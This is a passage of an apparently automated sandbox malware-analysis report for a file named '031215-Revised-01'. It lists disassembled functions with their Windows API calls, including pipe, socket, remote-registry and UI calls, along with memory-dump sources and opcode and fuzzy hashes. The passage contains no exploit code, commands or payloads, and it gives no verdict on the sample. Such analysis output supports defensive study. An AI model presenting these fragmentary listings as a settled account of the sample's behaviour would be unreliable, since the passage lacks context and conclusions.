                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                        • String ID:
                                        • API String ID: 3761583154-0
                                        • Opcode ID: ad719607bb837ef216e219095e753c273f3ae68516f70b0bcbd5ab2a8b539014
                                        • Instruction ID: 62497bc6b464995094c8ac2281cc91652b3044a7db2d0bd81b3da40f9a0de2a7
                                        • Opcode Fuzzy Hash: ad719607bb837ef216e219095e753c273f3ae68516f70b0bcbd5ab2a8b539014
                                        • Instruction Fuzzy Hash: D7217176608219AFDB109FA8CC84CBB77ECFB097647048526F959DB291E6709C818BB4
                                        Function 000D77FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000D7842
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000D7868
                                        • SysAllocString.OLEAUT32(00000000), ref: 000D786B
                                        • SysAllocString.OLEAUT32 ref: 000D788C
                                        • SysFreeString.OLEAUT32 ref: 000D7895
                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 000D78AF
                                        • SysAllocString.OLEAUT32(?), ref: 000D78BD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                        • String ID:
                                        • API String ID: 3761583154-0
                                        • Opcode ID: 2b1680431c10056fd365a3cff88e2a2bcb487b270b4d98129a83a1286a8617b9
                                        • Instruction ID: c019f996323b99258cfcfaec71d03c907f41c6bea7f4cc288086dae20bb910d0
                                        • Opcode Fuzzy Hash: 2b1680431c10056fd365a3cff88e2a2bcb487b270b4d98129a83a1286a8617b9
                                        • Instruction Fuzzy Hash: C2214435604205AFDB10AFB8DC89DBA77ECFB097607108126F959CB2A1EA74DC81DB74
                                        Function 000E04D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetStdHandle.KERNEL32(0000000C), ref: 000E04F2
                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 000E052E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CreateHandlePipe
                                        • String ID: nul
                                        • API String ID: 1424370930-2873401336
                                        • Opcode ID: c1d1fa9df03e9f02c11292978621c6f9a9e98b9d8399b337ed9c9e89337d0aa3
                                        • Instruction ID: 5574a9fd177f52a2bf5251ed29f62512e4994a91c4bbfe67193a3b3b0ff3d840
                                        • Opcode Fuzzy Hash: c1d1fa9df03e9f02c11292978621c6f9a9e98b9d8399b337ed9c9e89337d0aa3
                                        • Instruction Fuzzy Hash: 73215E76500745EFDB209F2ADC44A9B77F4AF85764F604A19E8E1E62E0D7B09980CF60
                                        Function 000E05A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetStdHandle.KERNEL32(000000F6), ref: 000E05C6
                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 000E0601
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CreateHandlePipe
                                        • String ID: nul
                                        • API String ID: 1424370930-2873401336
                                        • Opcode ID: f724819d0b9f6a5c2681aa498b817cf07fdd2d187f3ecb9f865c7bbc0711d0f3
                                        • Instruction ID: ec67d3beca986d446984c33adad9f54c333f3604c9c54c219a9c3d29ca5d018f
                                        • Opcode Fuzzy Hash: f724819d0b9f6a5c2681aa498b817cf07fdd2d187f3ecb9f865c7bbc0711d0f3
                                        • Instruction Fuzzy Hash: 4C217F755003459FDB209F6A9C04B9A77E8BF95724F240B1AE8A1F72E0D7F099E0CB50
                                        Function 001040AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0007600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0007604C
                                          • Part of subcall function 0007600E: GetStockObject.GDI32(00000011), ref: 00076060
                                          • Part of subcall function 0007600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0007606A
                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00104112
                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0010411F
                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0010412A
                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00104139
                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00104145
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$CreateObjectStockWindow
                                        • String ID: Msctls_Progress32
                                        • API String ID: 1025951953-3636473452
                                        • Opcode ID: 3b5b4e03c6786a0b9b72d59da6e5d559c1b38ad679ebf29a907ab9b5961d2381
                                        • Instruction ID: 009aef5990459c4cafcfc122a69f64e0a8c7e47a54fd93ffda8891db2a8d31f3
                                        • Opcode Fuzzy Hash: 3b5b4e03c6786a0b9b72d59da6e5d559c1b38ad679ebf29a907ab9b5961d2381
                                        • Instruction Fuzzy Hash: F11193B214011DBEEF119F64CC85EE77F5DEF08798F014110B758A2190CBB29C61DBA4
                                        Function 000AD7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 000AD7A3: _free.LIBCMT ref: 000AD7CC
                                        • _free.LIBCMT ref: 000AD82D
                                          • Part of subcall function 000A29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,000AD7D1,00000000,00000000,00000000,00000000,?,000AD7F8,00000000,00000007,00000000,?,000ADBF5,00000000), ref: 000A29DE
                                          • Part of subcall function 000A29C8: GetLastError.KERNEL32(00000000,?,000AD7D1,00000000,00000000,00000000,00000000,?,000AD7F8,00000000,00000007,00000000,?,000ADBF5,00000000,00000000), ref: 000A29F0
                                        • _free.LIBCMT ref: 000AD838
                                        • _free.LIBCMT ref: 000AD843
                                        • _free.LIBCMT ref: 000AD897
                                        • _free.LIBCMT ref: 000AD8A2
                                        • _free.LIBCMT ref: 000AD8AD
                                        • _free.LIBCMT ref: 000AD8B8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                        • Instruction ID: b38c6f681fe2aa6d319fb9393d35d6ff975801ed07d05bf22e449dc8561ee7b5
                                        • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                        • Instruction Fuzzy Hash: 5C115E71544B04AAD661BFF0CC47FCF7BDCAF02B40F400826B29AA68A3EE65B5058661
                                        Function 000DDA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 000DDA74
                                        • LoadStringW.USER32(00000000), ref: 000DDA7B
                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 000DDA91
                                        • LoadStringW.USER32(00000000), ref: 000DDA98
                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 000DDADC
                                        Strings
                                        • %s (%d) : ==> %s: %s %s, xrefs: 000DDAB9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: HandleLoadModuleString$Message
                                        • String ID: %s (%d) : ==> %s: %s %s
                                        • API String ID: 4072794657-3128320259
                                        • Opcode ID: 38bfebd7f28c793beb0816eca84f0528ab047deb57f8654751d06ba12d2b74fc
                                        • Instruction ID: 043fef8c50e2f5aefe869d6c25d015a8475fa602ecebe0b0b7c5c73e4b236c3e
                                        • Opcode Fuzzy Hash: 38bfebd7f28c793beb0816eca84f0528ab047deb57f8654751d06ba12d2b74fc
                                        • Instruction Fuzzy Hash: 100186F6900308BFE7109BA4DD89EEB376CE708301F404592B746E2181E6B49EC48FB5
                                        Function 000E096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InterlockedExchange.KERNEL32(0141E690,0141E690), ref: 000E097B
                                        • EnterCriticalSection.KERNEL32(0141E670,00000000), ref: 000E098D
                                        • TerminateThread.KERNEL32(006F0074,000001F6), ref: 000E099B
                                        • WaitForSingleObject.KERNEL32(006F0074,000003E8), ref: 000E09A9
                                        • CloseHandle.KERNEL32(006F0074), ref: 000E09B8
                                        • InterlockedExchange.KERNEL32(0141E690,000001F6), ref: 000E09C8
                                        • LeaveCriticalSection.KERNEL32(0141E670), ref: 000E09CF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                        • String ID:
                                        • API String ID: 3495660284-0
                                        • Opcode ID: eda9685869198bd1d531d2bd45ea0468648f7a26d89003d24dc80cf96a135a17
                                        • Instruction ID: 6b2b7e9add8db32160d17ed56d72c389510ca0563a6a07590d88c1ecbfe18521
                                        • Opcode Fuzzy Hash: eda9685869198bd1d531d2bd45ea0468648f7a26d89003d24dc80cf96a135a17
                                        • Instruction Fuzzy Hash: CDF0C932442A12ABD7515FA4EE89AD6BA69BF05702F402225F242A4CA1C7B594A5CFD0
                                        Function 00075D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 00075D30
                                        • GetWindowRect.USER32(?,?), ref: 00075D71
                                        • ScreenToClient.USER32(?,?), ref: 00075D99
                                        • GetClientRect.USER32(?,?), ref: 00075ED7
                                        • GetWindowRect.USER32(?,?), ref: 00075EF8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Rect$Client$Window$Screen
                                        • String ID:
                                        • API String ID: 1296646539-0
                                        • Opcode ID: 07fcf2d4654afc54ceba3b58349b0c457af8e5e62e13aa5c32f9657ec51e6ebb
                                        • Instruction ID: 672477b402fba95e2598678bbde5f182ea3cde2e578b6c685185d5590a21b217
                                        • Opcode Fuzzy Hash: 07fcf2d4654afc54ceba3b58349b0c457af8e5e62e13aa5c32f9657ec51e6ebb
                                        • Instruction Fuzzy Hash: 97B18834A00B4ADBDB24CFA9C8807EEB7F1FF58311F14851AE8A9D7250DB74AA50CB54
                                        Function 000A01B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                        Download Yara Rule
                                        APIs
                                        • __allrem.LIBCMT ref: 000A00BA
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000A00D6
                                        • __allrem.LIBCMT ref: 000A00ED
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000A010B
                                        • __allrem.LIBCMT ref: 000A0122
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000A0140
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 1992179935-0
                                        • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                        • Instruction ID: 39f5e06f75150f7374bc9dc450c398ef450c8598270dc1b9e7a9dc690a7deec7
                                        • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                        • Instruction Fuzzy Hash: 2381F772A0070A9BEB209FA8CC51BEB73E9AF42364F24453AF551D7282E770D9009B50
                                        Function 000F1D10 Relevance: 9.3, APIs: 6, Instructions: 254networkCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 000F3149: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,000F101C,00000000,?,?,00000000), ref: 000F3195
                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 000F1DC0
                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 000F1DE1
                                        • WSAGetLastError.WSOCK32 ref: 000F1DF2
                                        • inet_ntoa.WSOCK32(?), ref: 000F1E8C
                                        • htons.WSOCK32(?,?,?,?,?), ref: 000F1EDB
                                        • _strlen.LIBCMT ref: 000F1F35
                                          • Part of subcall function 000D39E8: _strlen.LIBCMT ref: 000D39F2
                                          • Part of subcall function 00076D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,0008CF58,?,?,?), ref: 00076DBA
                                          • Part of subcall function 00076D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,0008CF58,?,?,?), ref: 00076DED
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                                        • String ID:
                                        • API String ID: 1923757996-0
                                        • Opcode ID: 1f66263d00d6df6cd2042a0cca35052bb3ec7d46d5eedae6d535b038153c3bcc
                                        • Instruction ID: acc33f4e46fb0f988321aa34ecb745442c588b5c7815fae5f8c5567ec4a710e6
                                        • Opcode Fuzzy Hash: 1f66263d00d6df6cd2042a0cca35052bb3ec7d46d5eedae6d535b038153c3bcc
                                        • Instruction Fuzzy Hash: EDA1CE30504344AFC324EB20C885FBA77E5AF84318F54895CF59A5B6A3CB71ED46CB92
                                        Function 000A61FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,000982D9,000982D9,?,?,?,000A644F,00000001,00000001,8BE85006), ref: 000A6258
                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,000A644F,00000001,00000001,8BE85006,?,?,?), ref: 000A62DE
                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 000A63D8
                                        • __freea.LIBCMT ref: 000A63E5
                                          • Part of subcall function 000A3820: RtlAllocateHeap.NTDLL(00000000,?,00141444,?,0008FDF5,?,?,0007A976,00000010,00141440,000713FC,?,000713C6,?,00071129), ref: 000A3852
                                        • __freea.LIBCMT ref: 000A63EE
                                        • __freea.LIBCMT ref: 000A6413
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                        • String ID:
                                        • API String ID: 1414292761-0
                                        • Opcode ID: aec5bb244701bd029a257a4bb1af0bed96e4a2c40711cda1ae595cad98daf53b
                                        • Instruction ID: fe9e2ca16c57dfb18875d28ddc9c5bb03bb8f40586f34739ca9ead4a521f9175
                                        • Opcode Fuzzy Hash: aec5bb244701bd029a257a4bb1af0bed96e4a2c40711cda1ae595cad98daf53b
                                        • Instruction Fuzzy Hash: 5951BE72A00216ABDF258FE4CC81EAF76FAEF46750F184629F905D6181EB36DD41C6A0
                                        Function 000FBBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                          • Part of subcall function 000FC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000FB6AE,?,?), ref: 000FC9B5
                                          • Part of subcall function 000FC998: _wcslen.LIBCMT ref: 000FC9F1
                                          • Part of subcall function 000FC998: _wcslen.LIBCMT ref: 000FCA68
                                          • Part of subcall function 000FC998: _wcslen.LIBCMT ref: 000FCA9E
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000FBCCA
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000FBD25
                                        • RegCloseKey.ADVAPI32(00000000), ref: 000FBD6A
                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 000FBD99
                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 000FBDF3
                                        • RegCloseKey.ADVAPI32(?), ref: 000FBDFF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                        • String ID:
                                        • API String ID: 1120388591-0
                                        • Opcode ID: 75177f63d9d378b5f8c95b6cdb3ac5829bc340d72e3cad02c684b1cbf23d61bf
                                        • Instruction ID: 3636648c8bdc3fbf227887d63335b903033aadc206b762cc06966dfc8559368c
                                        • Opcode Fuzzy Hash: 75177f63d9d378b5f8c95b6cdb3ac5829bc340d72e3cad02c684b1cbf23d61bf
                                        • Instruction Fuzzy Hash: B3819B30208245AFD714DF24C881E6ABBE5FF84308F14895CF6994B6A2DB71ED45DF92
                                        Function 000CF7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VariantInit.OLEAUT32(00000035), ref: 000CF7B9
                                        • SysAllocString.OLEAUT32(00000001), ref: 000CF860
                                        • VariantCopy.OLEAUT32(000CFA64,00000000), ref: 000CF889
                                        • VariantClear.OLEAUT32(000CFA64), ref: 000CF8AD
                                        • VariantCopy.OLEAUT32(000CFA64,00000000), ref: 000CF8B1
                                        • VariantClear.OLEAUT32(?), ref: 000CF8BB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Variant$ClearCopy$AllocInitString
                                        • String ID:
                                        • API String ID: 3859894641-0
                                        • Opcode ID: 54089bbbe3bbf0944dbc5ea294d27265376117b89a04ef5f397133b2ded6ef72
                                        • Instruction ID: 6dbacc1f289bb87c6fe341185c792ec53dc9fb1b76ca37d80e7cf9d66c241334
                                        • Opcode Fuzzy Hash: 54089bbbe3bbf0944dbc5ea294d27265376117b89a04ef5f397133b2ded6ef72
                                        • Instruction Fuzzy Hash: 2451D431600312BBCF24AB65D895F7DB3A6EF45310B20946BE906DF292DB748C40DB97
                                        Function 000E910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00077620: _wcslen.LIBCMT ref: 00077625
                                          • Part of subcall function 00076B57: _wcslen.LIBCMT ref: 00076B6A
                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 000E94E5
                                        • _wcslen.LIBCMT ref: 000E9506
                                        • _wcslen.LIBCMT ref: 000E952D
                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 000E9585
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
